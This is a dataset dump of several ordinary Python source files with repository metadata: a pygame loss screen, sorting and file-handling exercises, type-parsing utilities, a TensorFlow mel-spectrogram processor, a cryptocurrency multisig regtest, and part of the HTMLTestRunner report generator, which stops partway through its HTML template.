| column | type | lengths / values |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 2–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | list | lengths 0–69 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–118 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | lengths 4–63 |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 2.91k–686M (nullable) |
| star_events_count | int64 | 0–209k |
| fork_events_count | int64 | 0–110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string | 213 classes |
| src_encoding | string | 30 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 2–10.3M |
| extension | string | 246 classes |
| content | string | lengths 2–10.3M |
| authors | list | lengths 1–1 |
| author_id | string | lengths 0–212 |
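The records below follow this schema, one source file per record. As a quick orientation, here is a minimal sketch of how a table like this could be streamed and inspected with the Hugging Face `datasets` library; the dataset path "org/dataset-name" is a hypothetical placeholder, since the dump does not name its source.

```python
# Minimal sketch, assuming the table is published as a Hugging Face dataset;
# "org/dataset-name" is a placeholder, not a real dataset path.
from datasets import load_dataset

rows = load_dataset("org/dataset-name", split="train", streaming=True)

for row in rows.take(3):
    # Each record pairs content identifiers with GitHub/GHA metadata
    # and the file's full source text in row["content"].
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
```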
blob_id: 7dd4a52eccf53f87ba02f0c31ca36819d8d641e7
directory_id: 6cd799da036e019e61ca25351c3c2b368aeda6f4
path: /lossScreenTest.py
content_id: 30158367f332718455312c2b49e234747e0a7977
detected_licenses: []
license_type: no_license
repo_name: Tammon23/IceCream-Jump-recreate
snapshot_id: d78f3c7c6352d8bef540df4cc5b182fdd76f543e
revision_id: bfcdf2bb823b9ebae6e9e399c974f358d8d2c61e
branch_name: refs/heads/master
visit_date: 2021-05-09T20:56:00.489803
revision_date: 2018-01-28T03:47:05
committer_date: 2018-01-28T03:47:05
github_id: 118,714,755
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,336
extension: py
content:
import math, random
import pygame
from pygame.locals import *
from settings import *
from functions import *
lossScreen = True
while lossScreen:
pygame.event.pump()
k = pygame.key.get_pressed()
if k[pygame.K_q] or k[pygame.K_ESCAPE]:
break
#start Splash screen
screen.fill(sBackground)
line1 = font2.render("You Lose!", True, BLACK)
line2 = font5.render("Your final score was: " + str(points), True, BLACK)
screen.blit(line1, (90, 100))
screen.blit(line2, (90, 210))
line3 = font1.render("- By Ikenna Uduh", True, BLACK)
screen.blit(line3, (w - 150, h - 25))
x,y = pygame.mouse.get_pos()
pygame.draw.circle(screen, sPAgainButtonClr, (int(w/2), int(h/2 + 50)), RAD3)
pygame.draw.circle(screen, BLACK, (int(w/2), int(h/2 + 50)), RAD3, 10)
line3 = font3.render("PLAY", True, BLACK)
line4 = font3.render("AGAIN", True, BLACK)
screen.blit(line3, (int(w/2) - 120, 400))
screen.blit(line4, (int(w/2) - 120, 500))
    # Check whether the mouse is hovering over (and clicking) the PLAY AGAIN button
if checkInCir(int(w/2), int(h/2 + 50), y, x, RAD3):
sPAgainButtonClr = sButtonClrPressed
if pygame.mouse.get_pressed()[0]:
gameStart = True
else:
sPAgainButtonClr = sButtonClr
pygame.display.flip()
pygame.quit()
authors: ["Tammon2000@gmail.com"]
author_id: Tammon2000@gmail.com

blob_id: fdec487f680975aba7bad02c2d5c07d9a4a332aa
directory_id: a269305ed7ae331ce13a6581659d6c8eed98f81d
path: /demo14_sorted.py
content_id: 97e080c88a542a7f135f69332ebbb12dde1d41d6
detected_licenses: []
license_type: no_license
repo_name: Honfeil/pythonWorkspace
snapshot_id: e3490330350ef862526029a4f441a14bf14281c7
revision_id: 25c7b8a7d665a69c9adb84f468abeb483b27b7d4
branch_name: refs/heads/master
visit_date: 2021-01-15T17:50:16.677942
revision_date: 2017-10-07T16:19:51
committer_date: 2017-10-07T16:19:51
github_id: 99,761,808
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 633
extension: py
content:
# -*- coding: utf-8 -*-
# sorted()
li = sorted([35, 58, 42, 4, 65, 4, 5, 5, 2, 4, 55, 14, 5])
print(li)
li = [-5, 6, -7, 8, -9]
print(sorted(li))
print(sorted(li, key=abs))
# Sorting strings
li = ['Candy', 'Honey', 'atom', 'bust', 'Bug']
print(sorted(li))
print(sorted(li, key=str.lower))
# Review of map()
li = list(map(lambda s: s.capitalize(), li))
print(sorted(li, reverse=True))
# Suppose we represent student names and grades with a list of tuples:
L = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]
def sk(m):
return m[0]
def ss(m):
return m[1]
print(sorted(L, key=sk))
print(sorted(L, key=ss, reverse=True))
authors: ["honfeil.163.com"]
author_id: honfeil.163.com

blob_id: 022da1ef07e8a25cde535e2903bacc012f2e4f9b
directory_id: 74aa886d0e28c2792751a45a8392e9ffb8ca45e1
path: /base/utils/type_utils.py
content_id: b73f49014a848cb05a500b6712c84a0fe733b36b
detected_licenses: []
license_type: no_license
repo_name: bluesky139/MjolnirTornado
snapshot_id: 16d7cb3ecb6748bd557396de471846f7f09bd860
revision_id: 18fd0567dbb167423d0079ed86d7b191fe1cb77b
branch_name: refs/heads/master
visit_date: 2020-06-01T05:24:43.707431
revision_date: 2019-12-27T07:05:05
committer_date: 2019-12-27T07:05:05
github_id: 94,063,353
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,019
extension: py
content:
import re
from base import *
class List(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert list.'):
try:
return value.split('|')
except:
raise except_class('Invalid list format, %s', except_message)
class Int(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert int.'):
try:
return int(value)
except:
raise except_class('Invalid int, %s', except_message)
class Float(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert float.'):
try:
return float(value)
except:
raise except_class('Invalid float, %s', except_message)
class Bool(object):
@classmethod
def parse(cls, value, except_class=InvalidArguments, except_message='Can\'t convert bool.'):
return value in [True, 'True', 'true', 'TRUE', '1', 1]
class Dict(object):
@classmethod
def make_sure_key(cls, value, key, default_value=''):
if key not in value:
value[key] = default_value
class NoConvert(object):
@classmethod
def parse(cls, value, except_class=None, except_message=None):
return value
class String(object):
VALID_STR_LETTER = int('001', 2)
VALID_STR_DIGIT = int('010', 2)
VALID_STR_UNDERSCORE = int('100', 2)
_valid_str_regs = {}
@classmethod
def validate(cls, s, flag, except_class=InvalidArguments, except_message='Invalid string'):
        # Compiled patterns are cached per flag combination on the class.
        if flag not in cls._valid_str_regs:
            reg = r'^['
            if flag & cls.VALID_STR_LETTER:
                reg += r'a-zA-Z'
            if flag & cls.VALID_STR_DIGIT:
                reg += r'\d'
            if flag & cls.VALID_STR_UNDERSCORE:
                reg += r'_'
            reg += r']+$'
            cls._valid_str_regs[flag] = re.compile(reg)
        reg = cls._valid_str_regs[flag]
if reg.match(s) is None:
raise except_class('%s, %s' % (except_message, s))
return False
return True
@classmethod
def lower_upper_with_underscore(cls, s):
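        # "CamelCase" -> "camel_case": prefix each uppercase letter with '_', lowercase it, then strip the leading '_'.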
return ''.join('_' + c.lower() if c.isupper() else c for c in s).lstrip('_')
authors: ["bluesky139@gmail.com"]
author_id: bluesky139@gmail.com

blob_id: cd443962bf7cf38b44666bf351ee733655fb1f43
directory_id: 539c7a9147965b248625b5bb3507737f141accf2
path: /20_Funcs_Files.py
content_id: 9981781a1e970eb4b12316ebee246d94671f8b00
detected_licenses: []
license_type: no_license
repo_name: rtvalluri/LearnPythonTHW
snapshot_id: 24c775ff43cb21cf49531d6ecf57c49810c61ea5
revision_id: 9104b53a25421a18ddd33b8d2a47ff3b13c3eea3
branch_name: refs/heads/master
visit_date: 2021-01-10T18:34:12.352028
revision_date: 2015-03-02T06:55:11
committer_date: 2015-03-02T06:55:11
github_id: 21,772,104
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 556
extension: py
content:
from sys import argv
scriptname,filename = argv
def print_all(f):
print f.read()
def rewind(f):
    f.seek(0)  # back to the start of the file
    # f.seek(0, 2) seeks to the end of the file
    # f.seek(0, 1) keeps the current position
    # f.seek(-3, 2) seeks to the 3rd byte from the end
def print_line(f):
print f.readline()
current_file = open(filename)
print "\nPrinting entire File"
print_all(current_file)
print "\nRewinding"
rewind(current_file)
print "\nPrinting line by line\n"
print_line(current_file)
print_line(current_file)
print_line(current_file)
current_file.close()
authors: ["valluriraviteja@gmail.com"]
author_id: valluriraviteja@gmail.com

blob_id: 3f7354b9288836c07c2c87bd9ffea73108e2c462
directory_id: 5390bfe2cb9732547ca36d655bc206665b357e97
path: /pytorch/audio_tf.py
content_id: c35a7dda5c040071bdcc5f92d87849bbad8e496e
detected_licenses: ["BSD-3-Clause", "LicenseRef-scancode-free-unknown"]
license_type: permissive
repo_name: vladbataev/nv-wavenet
snapshot_id: 71682ad79e6107f44dd50726db27ce657280623a
revision_id: 2e16155cef2a460bb7862df674a1b8fa074a5cab
branch_name: refs/heads/master
visit_date: 2020-03-28T17:11:06.953684
revision_date: 2019-08-02T14:35:05
committer_date: 2019-08-02T14:35:05
github_id: 148,765,145
star_events_count: 1
fork_events_count: 0
gha_license_id: BSD-3-Clause
gha_event_created_at: 2018-09-14T09:14:19
gha_created_at: 2018-09-14T09:14:18
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 4,660
extension: py
content:
import json
import librosa
import math
import numpy as np
import tensorflow as tf
LOG10_TO_LN = math.log(10)
LN_TO_LOG10 = 1 / LOG10_TO_LN
DB_TO_LN = LOG10_TO_LN / 20
LN_TO_DB = 20 * LN_TO_LOG10  # 20 because power is proportional to the square of the amplitude
class AudioProcessor:
def __init__(self, audio_config):
params = self._load_params(audio_config)
for k, v in params.items():
self.__setattr__(k, v)
@staticmethod
def _load_params(filepath):
with open(filepath) as fin:
params = json.load(fin)
return params
def _name_to_window_fn(self, name):
mapping = {
"hann": tf.contrib.signal.hann_window,
"hamming": tf.contrib.signal.hamming_window,
}
return mapping[name]
def preemphasis(self, signals):
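        # Preemphasis y[n] = x[n] - coef * x[n-1]: pad a right-shifted copy of the signal, scale by -coef, and add.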
paddings = [
[0, 0],
[0, 0],
[1, 0]
]
emphasized = tf.pad(signals[:, :, :-1], paddings=paddings) * -self.preemphasis_coef + signals
return emphasized
def deemphasis(self, signal):
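        # Invert preemphasis with a truncated FIR approximation of the IIR filter 1 / (1 - coef * z^-1).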
fir_approximation = [1]
for i in range(math.ceil(1 / (1 - self.preemphasis_coef))):
fir_approximation.append(fir_approximation[-1] * self.preemphasis_coef)
filters = tf.constant(fir_approximation[::-1], dtype=tf.float32, shape=(len(fir_approximation), 1, 1))
paddings = [
[0, 0],
[len(fir_approximation), 0],
]
signal = tf.pad(signal, paddings)
return tf.nn.conv1d(signal[:, :, None], filters, 1, data_format="NWC", padding="VALID")[:, :, 0]
def amp_to_db(self, signal):
return LN_TO_DB * tf.log(tf.maximum(self.min_level, signal))
def dbfs_normalize(self, signal):
max_value = tf.reduce_max(signal, axis=[1, 2, 3], keepdims=True)
return signal - max_value
def normalize_and_clip_db(self, signal_db):
"""
        Clips the signal in decibels to [0; -min_level_db] and then normalizes it to [-max_abs_value; max_abs_value]
        when symmetric output is enabled, or to [0; max_abs_value] otherwise.
:param signal_db:
:return: clipped signal in decibels to [-max_abs_value; max_abs_value] or [0; max_abs_value].
"""
clipped = signal_db - self.min_level_db
normalized = tf.clip_by_value(clipped / -self.min_level_db, 0, 1)
if self.symmetric_output:
normalized = (normalized * 2 - 1)
# so output now in [-1; 1]
normalized *= self.max_abs_value
return normalized
def linear_scale_to_normalized_log_scale(self, spectrogram):
spectrogram_db = self.amp_to_db(spectrogram)
if self.dbfs_normalization:
spectrogram_db = self.dbfs_normalize(spectrogram_db)
spectrogram_db -= self.ref_level_db
return self.normalize_and_clip_db(spectrogram_db)
def _mel_basis(self):
if self.use_tf_mel_basis:
mel_basis = tf.contrib.signal.linear_to_mel_weight_matrix(
self.num_mel_bins, self.window_size // 2 + 1, self.sample_rate,
self.lower_edge_hertz, self.upper_edge_hertz
)
else:
mel_basis = librosa.filters.mel(
sr=self.sample_rate,
n_fft=self.window_size,
n_mels=self.num_mel_bins,
fmin=self.lower_edge_hertz,
fmax=self.upper_edge_hertz
)
mel_basis = tf.convert_to_tensor(np.transpose(mel_basis, (1, 0)), dtype=tf.float32)
return mel_basis
def compute_spectrum(self, signal):
"""
        :param signal: 1-D tensor of audio samples, reshaped internally to [1, 1, num_timestamps]
        :return: normalized log-mel spectrogram of shape [num_mel_bins, num_frames]
"""
with tf.name_scope("extract_feats"):
frame_length = self.window_size
frame_step = self.window_step
signals = signal[None, None, ...]
if self.apply_preemphasis:
signals = self.preemphasis(signals)
stfts = tf.contrib.signal.stft(signals, frame_length=frame_length, frame_step=frame_step,
fft_length=frame_length,
window_fn=self._name_to_window_fn(self.window_fn_name),
pad_end=True)
linear_spectrograms = tf.abs(stfts)
mel_spectrograms = tf.tensordot(linear_spectrograms, self._mel_basis(), 1)
normed_mel_spectrograms_db = self.linear_scale_to_normalized_log_scale(mel_spectrograms)
return tf.transpose(normed_mel_spectrograms_db[0, 0], (1, 0))
authors: ["v.bataev@tinkoff.ru"]
author_id: v.bataev@tinkoff.ru

blob_id: 8177accba9ea1009914fc04bc9522e187b19a4bc
directory_id: 82008bbe06f77d17898565e20d08bf34bf28c313
path: /test/functional/wallet_scriptaddress2.py
content_id: 4c431a5ed81f6d5e0aac1749f833e51d0f3e9782
detected_licenses: ["MIT"]
license_type: permissive
repo_name: hantobi-europe/aox
snapshot_id: 6e6884c852fcb08f8c5d89384c9ae60746d3f149
revision_id: 74cd6d07a0d4058648dbb5bc42d829a04a0e5327
branch_name: refs/heads/main
visit_date: 2023-02-07T20:36:36.487504
revision_date: 2020-12-28T18:11:13
committer_date: 2020-12-28T18:11:13
github_id: 323,902,355
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 3,968
extension: py
content:
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test new aox multisig prefix functionality.
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class ScriptAddress2Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.setup_clean_chain = True
self.extra_args = [['-addresstype=legacy', '-deprecatedrpc=accounts', '-txindex=1'], [], ['-txindex=1']]
def setup_network(self, split=False):
self.setup_nodes()
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[2], 0)
self.sync_all()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
cnt = self.nodes[0].getblockcount()
# Mine some blocks
self.nodes[1].generate(101)
self.sync_all()
if (self.nodes[0].getblockcount() != cnt + 101):
raise AssertionError("Failed to mine 100 blocks")
addr = self.nodes[0].getnewaddress()
addr2 = self.nodes[0].getnewaddress()
multisig_addr = self.nodes[0].addmultisigaddress(2, [addr, addr2], "multisigaccount")['address']
assert_equal(multisig_addr[0], 'Q')
# Send to a new multisig address
txid = self.nodes[1].sendtoaddress(multisig_addr, 1)
self.nodes[1].generate(101)
self.sync_all()
tx = self.nodes[0].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr in dest_addrs)
# Spend from the new multisig address
addr3 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr3, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.2)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr3)
# Send to an old multisig address. The api addmultisigaddress
# can only generate a new address so we manually compute
# multisig_addr_old beforehand using an old client.
priv_keys = ["cU7eeLPKzXeKMeZvnEJhvZZ3tLqVF3XGeo1BbM8dnbmV7pP3Qg89",
"cTw7mRhSvTfzqCt6MFgBoTBqwBpYu2rWugisXcwjv4cAASh3iqPt"]
addrs = ["mj6gNGRXPXrD69R5ApjcsDerZGrYKSfb6v",
"mqET4JA3L7P7FoUjUP3F6m6YsLpCkyzzou"]
self.nodes[0].importprivkey(priv_keys[0])
self.nodes[0].importprivkey(priv_keys[1])
multisig_addr_new = self.nodes[0].addmultisigaddress(2, addrs, "multisigaccount2")['address']
assert_equal(multisig_addr_new, 'QZ974ZrPrmqMmm1PSVp4m8YEgo3bCQZBbe')
multisig_addr_old = "2N5nLwYz9qfnGdaFLpPn3gS6oYQbmLTWPjq"
# Let's send to the old address. We can then find it in the
# new address with the new client. So basically the old
# address and the new one are the same thing.
txid = self.nodes[1].sendtoaddress(multisig_addr_old, 1)
self.nodes[1].generate(1)
self.sync_all()
tx = self.nodes[2].getrawtransaction(txid, 1)
dest_addrs = [tx["vout"][0]['scriptPubKey']['addresses'][0],
tx["vout"][1]['scriptPubKey']['addresses'][0]]
assert(multisig_addr_new in dest_addrs)
assert(multisig_addr_old not in dest_addrs)
# Spend from the new multisig address
addr4 = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr4, 0.8)
self.nodes[0].generate(2)
self.sync_all()
assert(self.nodes[0].getbalance("*", 1) < 0.4)
assert(self.nodes[1].listtransactions()[-1]['address'] == addr4)
if __name__ == '__main__':
ScriptAddress2Test().main()
authors: ["hantobieurope@gmail.com"]
author_id: hantobieurope@gmail.com

blob_id: e94744e7b239a81f6c68a4137135d89cf5d8165c
directory_id: d83892a8df7127154d99bf0e4cc3215f971fef01
path: /HTMLTestRunner.py
content_id: af409dc5b99e2d51b346cb452de2cdc3db682829
detected_licenses: []
license_type: no_license
repo_name: gxq0909/bowentest
snapshot_id: ae4436947026380822b3bf8d570b9f2fd2f510fe
revision_id: 1d78612b493e499721634a1f66a700c6d21f838e
branch_name: refs/heads/master
visit_date: 2023-01-12T13:45:15.203004
revision_date: 2020-11-17T02:27:54
committer_date: 2020-11-17T02:27:54
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 26,921
extension: py
content:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time    : 2018/11/19 3:03 PM
# @Author : 张新礼
# @File : HTMLTestRunner.py
# @Software: PyCharm
"""
A TestRunner for use with the Python unit testing framework. It
generates an HTML report to show the results at a glance.
The simplest way to use this is to invoke its main method. E.g.
import unittest
import HTMLTestRunner
... define your tests ...
if __name__ == '__main__':
    HTMLTestRunner.main()
For more customization options, instantiate an HTMLTestRunner object.
HTMLTestRunner is a counterpart to unittest's TextTestRunner. E.g.
# output to a file
fp = open('my_report.html', 'wb')
runner = HTMLTestRunner.HTMLTestRunner(
    stream=fp,
    title='My unit test',
    description='This demonstrates the report output by HTMLTestRunner.'
)
# Use an external stylesheet.
# See the Template_mixin class for more customizable options
runner.STYLESHEET_TMPL = '<link rel="stylesheet" href="my_stylesheet.css" type="text/css">'
# run the test
runner.run(my_test_suite)
------------------------------------------------------------------------
Copyright (c) 2004-2007, Wai Yip Tung
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name Wai Yip Tung nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# URL: http://tungwaiyip.info/software/HTMLTestRunner.html
__author__ = "Wai Yip Tung, Findyou"
__version__ = "0.8.2.2"
"""
Change History
Version 0.8.2.1 -Findyou
* Changed to support Python 3
Version 0.8.2.1 -Findyou
* Chinese language support, localization
* Adjusted and polished the styles (requires a network connection; uses Baidu-hosted Bootstrap.js)
* Added display grouped by pass status, plus tester and pass-rate display
* Improved the toggle between the "detail" and "collapse" states
* Added a back-to-top anchor
Version 0.8.2
* Show output inline instead of popup window (Viorel Lupu).
Version in 0.8.1
* Validated XHTML (Wolfgang Borgert).
* Added description of test classes and test cases.
Version in 0.8.0
* Define Template_mixin class for customization.
* Work around an IE 6 bug where it does not treat a <script> block as CDATA.
Version in 0.7.1
* Back port to Python 2.3 (Frank Horowitz).
* Fix missing scroll bars in detail log (Podi).
"""
# TODO: color stderr
# TODO: simplify javascript using more than 1 class in the class attribute?
import datetime
import io
import sys
import time
import unittest
from xml.sax import saxutils
# ------------------------------------------------------------------------
# The redirectors below are used to capture output during testing. Output
# sent to sys.stdout and sys.stderr is automatically captured. However,
# in some cases sys.stdout is already cached before HTMLTestRunner is
# invoked (e.g. by calling logging.basicConfig). In order to capture that
# output, use the redirectors for the cached stream.
#
# e.g.
# >>> logging.basicConfig(stream=HTMLTestRunner.stdout_redirector)
# >>>
class OutputRedirector(object):
""" Wrapper to redirect stdout or stderr """
def __init__(self, fp):
self.fp = fp
def write(self, s):
self.fp.write(s)
def writelines(self, lines):
self.fp.writelines(lines)
def flush(self):
self.fp.flush()
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
# ----------------------------------------------------------------------
# Template
class Template_mixin(object):
"""
    Define an HTML template for report customization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
STATUS = {
0: '通过',
1: '失败',
2: '错误',
}
DEFAULT_TITLE = '单元测试报告'
DEFAULT_DESCRIPTION = ''
DEFAULT_TESTER='QAHE'
# ------------------------------------------------------------------------
# HTML Template
HTML_TMPL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta name="generator" content="%(generator)s"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet">
<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="http://libs.baidu.com/bootstrap/3.0.3/js/bootstrap.min.js"></script>
%(stylesheet)s
</head>
<body >
<script language="javascript" type="text/javascript">
output_list = Array();
    /* level: adjusted to add filters that show only one category of cases --Findyou
0:Summary //all hiddenRow
1:Failed //pt hiddenRow, ft none
2:Pass //pt none, ft hiddenRow
3:All //pt none, ft none
*/
function showCase(level) {
trs = document.getElementsByTagName("tr");
for (var i = 0; i < trs.length; i++) {
tr = trs[i];
id = tr.id;
if (id.substr(0,2) == 'ft') {
if (level == 2 || level == 0 ) {
tr.className = 'hiddenRow';
}
else {
tr.className = '';
}
}
if (id.substr(0,2) == 'pt') {
if (level < 2) {
tr.className = 'hiddenRow';
}
else {
tr.className = '';
}
}
}
    // Toggle the link text between "detail" and "collapse" --Findyou
detail_class=document.getElementsByClassName('detail');
//console.log(detail_class.length)
if (level == 3) {
for (var i = 0; i < detail_class.length; i++){
detail_class[i].innerHTML="收起"
}
}
else{
for (var i = 0; i < detail_class.length; i++){
detail_class[i].innerHTML="详细"
}
}
}
function showClassDetail(cid, count) {
var id_list = Array(count);
var toHide = 1;
for (var i = 0; i < count; i++) {
        // IDs use an underscore instead of a dot -Findyou
tid0 = 't' + cid.substr(1) + '_' + (i+1);
tid = 'f' + tid0;
tr = document.getElementById(tid);
if (!tr) {
tid = 'p' + tid0;
tr = document.getElementById(tid);
}
id_list[i] = tid;
if (tr.className) {
toHide = 0;
}
}
for (var i = 0; i < count; i++) {
tid = id_list[i];
        // Fixed a bug where rows could not be collapsed on click; the "detail" text now toggles --Findyou
if (toHide) {
document.getElementById(tid).className = 'hiddenRow';
document.getElementById(cid).innerText = "详细"
}
else {
document.getElementById(tid).className = '';
document.getElementById(cid).innerText = "收起"
}
}
}
function html_escape(s) {
        s = s.replace(/&/g,'&amp;');
        s = s.replace(/</g,'&lt;');
        s = s.replace(/>/g,'&gt;');
return s;
}
</script>
%(heading)s
%(report)s
%(ending)s
</body>
</html>
"""
# variables: (title, generator, stylesheet, heading, report, ending)
# ------------------------------------------------------------------------
# Stylesheet
#
# alternatively use a <link> for external style sheet, e.g.
# <link rel="stylesheet" href="$url" type="text/css">
STYLESHEET_TMPL = """
<style type="text/css" media="screen">
body { font-family: Microsoft YaHei,Tahoma,arial,helvetica,sans-serif;padding: 30px; font-size: 10px; }
table { font-size: 30px; }
/* -- heading ---------------------------------------------------------------------- */
.heading {
margin-top: 0ex;
margin-bottom: 1ex;
}
.heading .description {
margin-top: 4ex;
margin-bottom: 6ex;
}
/* -- report ------------------------------------------------------------------------ */
#total_row { font-weight: bold; }
.passCase { color: #5cb85c; }
.failCase { color: #d9534f; font-weight: bold; }
.errorCase { color: #f0ad4e; font-weight: bold; }
.hiddenRow { display: none; }
.testcase { margin-left: 2em; }
</style>
"""
# ------------------------------------------------------------------------
# Heading
#
HEADING_TMPL = """<div class='heading'>
<h1 style="font-family: Microsoft YaHei">%(title)s</h1>
%(parameters)s
<p class='description'>%(description)s</p>
</div>
""" # variables: (title, parameters, description)
HEADING_ATTRIBUTE_TMPL = """<p class='attribute'><strong>%(name)s : </strong> %(value)s</p>
""" # variables: (name, value)
# ------------------------------------------------------------------------
# Report
#
    # Localized to Chinese, with styling improvements --Findyou
REPORT_TMPL = """
<p id='show_detail_line'>
<a class="btn btn-primary" href='javascript:showCase(0)'>概要{ %(passrate)s }</a>
<a class="btn btn-danger" href='javascript:showCase(1)'>失败{ %(fail)s }</a>
<a class="btn btn-success" href='javascript:showCase(2)'>通过{ %(Pass)s }</a>
<a class="btn btn-info" href='javascript:showCase(3)'>所有{ %(count)s }</a>
</p>
<table id='result_table' class="table table-condensed table-bordered table-hover">
<colgroup>
<col align='left' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
</colgroup>
<tr id='header_row' class="text-center success" style="font-weight: bold;font-size: 14px;">
<td>用例集/测试用例</td>
<td>总计</td>
<td>通过</td>
<td>失败</td>
<td>错误</td>
<td>详细</td>
</tr>
%(test_list)s
<tr id='total_row' class="text-center active">
<td>总计</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>通过率:%(passrate)s</td>
</tr>
</table>
""" # variables: (test_list, count, Pass, fail, error ,passrate)
REPORT_CLASS_TMPL = r"""
<tr class='%(style)s warning'>
<td>%(desc)s</td>
<td class="text-center">%(count)s</td>
<td class="text-center">%(Pass)s</td>
<td class="text-center">%(fail)s</td>
<td class="text-center">%(error)s</td>
<td class="text-center"><a href="javascript:showClassDetail('%(cid)s',%(count)s)" class="detail" id='%(cid)s'>详细</a></td>
</tr>
""" # variables: (style, desc, count, Pass, fail, error, cid)
    # Style for failed cases; removed the original JS effect and improved the presentation -Findyou
REPORT_TEST_WITH_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='5' align='center'>
        <!-- Collapse error details by default -Findyou
<button id='btn_%(tid)s' type="button" class="btn btn-danger btn-xs collapsed" data-toggle="collapse" data-target='#div_%(tid)s'>%(status)s</button>
<div id='div_%(tid)s' class="collapse"> -->
